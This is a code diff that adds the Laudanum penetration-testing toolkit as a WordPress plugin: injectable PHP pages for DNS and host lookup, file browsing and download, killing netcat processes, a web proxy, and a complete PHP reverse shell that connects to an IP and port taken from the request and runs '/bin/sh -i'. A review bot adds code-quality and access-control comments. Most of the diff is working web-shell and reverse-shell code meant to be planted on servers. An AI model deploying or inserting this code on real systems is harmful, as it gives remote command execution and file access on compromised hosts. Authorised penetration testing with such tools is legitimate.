*** Tim Medin <tim@securitywhole.com>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
@ -87,7 +87,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
Copyright &copy; 2012, <a
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
@ -400,7 +400,7 @@ echo rtrim($padding . $_SESSION['output']);
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.


@ -0,0 +1,108 @@
* Plugin Name: Laudanum
* Description: This plugin is leveraged for running security tests and should be left disabled when not in use.
* Author: Jason Gillam and the Laudanum Team
* Version: 0.02
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with
*** other Word Press plugins, this entire directory should be zipped up for deployment.
*** The templates/ipcheck.php file should be updated with the tester's IP address first.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
class WP_Laudanum
public function __construct()
add_action('admin_menu', array(&$this, 'add_menu'));
public function __activate()
public function __deactivate()
public function add_menu()
add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page'));
public function plugin_settings_page()
wp_die(__('You do not have sufficient permissions to access this page.'));
include(sprintf("%s/templates/settings.php", dirname(__FILE__)));
register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));
register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate'));
$wp_laudanum = new WP_Laudanum();
if(isset($wp_laudanum)) {
function plugin_settings_link($links)
$settings_link = '<a href="options-general.php?page=wp_laudanum">Settings</a>';
array_unshift($links, $settings_link);
return $links;
$plugin = plugin_basename(__FILE__);
add_filter("plugin_action_links_$plugin", 'plugin_settings_link');
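Review bot: The hooks near the end of the file register `array('WP_Laudanum', 'activate')` and `array('WP_Laudanum', 'deactivate')`, but the class as shown only declares `__activate()` and `__deactivate()`, so neither callback would resolve when the plugin is toggled. Declaring them as `public static function activate()` and `public static function deactivate()` would match both the registered names and the static-style callable. The global `plugin_settings_link` is also unprefixed and could collide with another plugin; a prefixed name such as `wp_laudanum_settings_link` would be safer. This rendering drops brace-only lines, so the method bodies and the condition guarding `wp_die()` are not visible here.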


@ -0,0 +1,144 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP DNS Access</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum PHP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>DNS Query 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
if (!in_array($type, array_keys($types))) {
$type = "ANY";
$validtype = 0;
foreach (array_keys($types) as $t) {
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
<input type="submit" value="Submit">
if ($query != '')
$result = dns_get_record($query, $types[$type], $authns, $addtl);
echo "<pre><results>";
echo "Result = ";
echo "Auth NS = ";
echo "Additional = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
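Review bot: The form's `action` attribute echoes `$_SERVER['PHP_SELF']` without escaping, so a crafted path suffix on the request URL is reflected into the page as markup. Use `action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) ?>"` here; the file browser and host lookup pages later in this commit build links and forms from `PHP_SELF` the same way. The lines that print `$result`, `$authns` and `$addtl` are not visible in this rendering. If they print the records raw, they should be escaped as well, since record contents such as TXT data are chosen by whoever controls the queried zone.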


@ -0,0 +1,182 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP File Browser</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if ($file != "") {
if(file_exists($file)) {
$s = split("/", $file);
$filename = $s[count($s) - 1];
header("Content-type: application/x-download");
header("Content-Length: ".filesize($file));
header("Content-Disposition: attachment; filename=\"".$filename."\"");
<title>Laudanum File Browser</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<body onload="init()">
<h1>Laudanum File Browser 0.1</h1>
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
// get the actual path, add an ending / if necessary
$curdir = realpath($dir);
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
$dirs = split("/",$curdir);
// Create the breadcrumb
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
$breadcrumb = '/';
foreach ($dirs as $d) {
if ($d != '') {
$breadcrumb .= $d . "/";
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
echo "</h2>";
// translate .. to a real dir
$parentdir = "";
for ($i = 0; $i < count($dirs) - 2; $i++) {
$parentdir .= $dirs[$i] . "/";
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
$listingdirs = array();
if ($handle = @opendir($curdir)) {
while ($o = readdir($handle)) {
if ($o == "." || $o == "..") continue;
if (@filetype($curdir . $o) == "dir") {
$listingdirs[] = $o . "/";
else {
$listingfiles[] = $o;
//display directories
foreach ($listingdirs as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
//display files
foreach ($listingfiles as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
else {
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
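Review bot: Directory entry names are written into the listing unescaped: `$f` is used as link text in both `foreach` loops and `$d` in the breadcrumb, so a file name containing markup is rendered as HTML in the tester's browser. Wrapping the displayed value, e.g. `htmlspecialchars($f, ENT_QUOTES)`, fixes this, and the `../` link should pass `$parentdir` through `urlencode()` as the other links do. Separately, `split()` was removed in PHP 7, so `split("/", $file)` and `split("/",$curdir)` need to become `explode("/", ...)` for the page to run on current PHP.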


@ -0,0 +1,126 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a host lookup by ip address.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
<input type="submit" value="Submit">
if ($query != '')
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
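Review bot: `$query` goes from `$_POST['query']` straight into `gethostbyaddr()`, which raises a warning and returns false for anything that is not a valid address. Validating first, e.g. `if ($query != '' && filter_var($query, FILTER_VALIDATE_IP))`, keeps malformed input away from the error handler and lets the page show a plain "not an IP address" message instead. `$type` is still read from `$_POST`, but nothing in the visible lines uses it, and the handler comment still refers to `chdir()`. Both look like leftovers from the DNS page and could be removed.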


@ -0,0 +1,61 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
*** by someone other than the person who uploaded Laudanum. This file should be included
*** in other Laudanum tools and not called directly.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$wpl_allowedIPs = array("", "", "");
# *********** No editable content below this line **************
$wpl_allowed = 0;
foreach ($wpl_allowedIPs as $IP) {
$wpl_allowed = 1;
if ($wpl_allowed == 0) {
header("HTTP/1.0 404 Not Found");
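Review bot: The shipped default `$wpl_allowedIPs = array("", "", "")` makes the filter's behaviour depend on how an empty entry compares, and the comparison inside the `foreach` is not visible in this rendering. Please confirm that empty entries are skipped (`if ($IP === '') continue;`) and that the match is made against `$_SERVER['REMOTE_ADDR']` only, not a client-supplied forwarding header. The deny branch should also end the request: `header("HTTP/1.0 404 Not Found");` on its own does not stop the including script, so it needs an `exit;` right after it unless one exists on a line this rendering dropped. A short comment stating that an unconfigured list denies everyone would document the fail-closed intent.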


@ -0,0 +1,103 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
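Review bot: `exec('killall nc')` appears to run on every load of the page, with no visible check of the request method, so any request that passes ipcheck.php, including a browser prefetch, terminates processes. Requiring a POST from a confirmation button before calling `exec()` would avoid that. The file comment says the processes killed are those "spawned by the current user", but `killall nc` matches by name, so it affects every `nc` process the web server account is allowed to signal; the comment should say so. The error page title `Laudanum PHP Hostname by IP Lookup` is copied from the host lookup page and should read `Laudanum Kill nc`.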


@ -0,0 +1,194 @@
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
// In all other respects the GPL version 2 applies:
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = isset($_POST['ip']) ? $_POST['ip'] : '';
//$ip = ''; // CHANGE THIS
//$port = 8888; // CHANGE THIS
$port = isset($_POST['port']) ? $_POST['port'] : '8888';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Daemonise ourself if possible to avoid zombies later
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
if ($pid) {
exit(0); // Parent exits
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
// Change to a safe directory
// Remove any umask we inherited
// Do the reverse shell...
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
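Review bot: Unlike the other tools added in this commit, no `include 'ipcheck.php';` is visible in this file, while `$ip` and `$port` are now read from `$_POST` instead of being hard-coded. If the include is really absent (this rendering drops some lines), the page has no access control of its own, and any client that can reach it on a host where it was left installed can use it. I would add the same include before `set_time_limit (0);` and reject the request unless `filter_var($ip, FILTER_VALIDATE_IP)` succeeds and `$port` is an integer between 1 and 65535. The header comment still says the connection goes to "a hardcoded IP and port", which no longer matches the code.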


@ -0,0 +1,336 @@
ini_set('session.use_cookies', '0');
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file acts as a browser-based proxy.
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Proxy</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; }
return $o;
function buildurl ($u) {
// build the url from the url array
// this is used because the built in function isn't
// avilable in all installs of php
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s;
function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir?
// assume if there is a . it is a file
// if it ends in a / then it is a dir
// if neither, than assume dir
$dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last));
$s .= $path;
return $s;
function getfilename ($u) {
// returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]);
return $s[count($s) - 1];
function getcontenttype ($headers) {
// gets the content type
foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0];
function getcontentencoding ($headers) {
foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0];
function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
return $headers;
function rewritecookies($headers) {
// removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
return $headers;
function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0];
return "0";
function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10;
$flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen;
if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 )
$i = $i + 2;
return @gzinflate( substr($gzData, $i, -8) );
} else {
return false;
return false;
function rewrite ($d, $u) {
$r = $d;
//rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference
